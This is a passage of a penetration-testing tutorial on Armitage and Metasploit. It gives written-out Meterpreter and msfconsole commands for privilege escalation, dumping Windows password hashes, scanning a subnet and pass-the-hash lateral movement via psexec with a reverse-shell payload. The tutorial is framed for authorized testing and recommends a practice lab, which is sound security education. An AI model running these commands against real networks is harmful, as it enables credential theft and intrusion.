Live-Fire Security Testing with Armitage and Metasploit
After post-exploitation, you'll want to compromise more hosts. Pass-the-hash is a technique for moving deeper into a Windows network.
Windows hosts do not pass your network credentials in the clear. Rather, they use a challenge-response scheme to generate a hash. Windows uses this hash to authenticate you on the Active Directory domain. Windows hosts cache and re-use hashes to authenticate to other hosts on the network. This saves you the trouble of retyping your password when you access a file share. Attackers use stolen hashes to get access to other hosts on your Active Directory domain.
Dumping cached hashes requires local administrator access. Use Meterpreter→Access→Escalate Privileges to try several local exploits to increase your privileges. Go to Meterpreter→Access→Dump Hashes to steal the local cached credentials.
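The Armitage menus above drive standard Meterpreter commands. A minimal console sketch of the same steps (the output lines are illustrative, and the dumped hash shown is a placeholder):

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

`getsystem` tries several local privilege-escalation techniques in turn; `hashdump` reads the local SAM hashes and requires SYSTEM privileges. Each dumped line has the form `user:RID:LM hash:NTLM hash:::`.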
Now you need targets. Use the auxiliary/scanner/smb/smb_version module to find other Windows hosts on the Active Directory domain.
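From the console, the scan looks like this (the address range is an example; substitute your own network):

```
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf auxiliary(smb_version) > set THREADS 16
msf auxiliary(smb_version) > run
```

Each responding host is fingerprinted with its Windows version, and Armitage adds it to the targets view.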
Go to Attacks→Find Attacks to generate an Attack menu for each host. Highlight several Windows hosts, right-click, and use Attacks→smb→pass the hash. Armitage lets you choose which set of credentials to try. Pick a pair and click Launch. You've passed the hash. Each successful login will give you a Meterpreter session.
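Under the hood, Armitage's pass-the-hash attack uses the Windows psexec exploit module, with the stolen hash supplied in place of a password. A minimal sketch, where the addresses are examples and the truncated `LM:NTLM` hash pair is a placeholder for values from your own hashdump:

```
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.20
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404ee...:31d6cfe0d16ae9...
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
msf exploit(psexec) > exploit
```

Note that SMBPass accepts a raw `LM hash:NTLM hash` pair; Windows authenticates the hash directly, which is why no password cracking is required.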
Microsoft has patched the vulnerabilities behind Metasploit's Windows privilege-escalation exploits. Attackers who compromise a fully patched system don't have to stop, though. They may scan for an unpatched host, exploit it, and then carry out these same steps from there.
Earlier, I defined a penetration test as a way to learn how attackers may get access to key systems and files. I suspect you did not find a working exploit for your key servers. Before you conclude your network penetration test, I'd like you to think like an attacker for a moment.
Attackers will use social engineering and client-side attacks to get a foothold. They then will try to exploit a workstation to collect hashes. With pass-the-hash, even your patched Windows systems are no longer safe. What happens if attackers access your workstation, install a key logger and download your SSH keys? One vulnerable host can lead to a total compromise of your otherwise secure assets.
In this article, I've shown you the techniques attackers use against your network. You learned how to scan your network, exploit hosts and carry out post-exploitation actions. You also learned how to maneuver deeper into your network using the pass-the-hash technique. The next step is to apply what you have learned.
I recommend that you download the Metasploitable virtual machine. Metasploitable has many services you can exploit for shell access and information. Attack Metasploitable to become familiar with Armitage and Metasploit before you start your first penetration test.
BackTrack Linux: www.backtrack-linux.org
Documentation for Armitage: www.fastandeasyhacking.com
Metasploitable Virtual Machine: blog.metasploit.com/2010/05/introducing-metasploitable.html
Raphael Mudge is the developer of Armitage. He lives in Washington, DC. Contact him at www.hick.org/~raffi.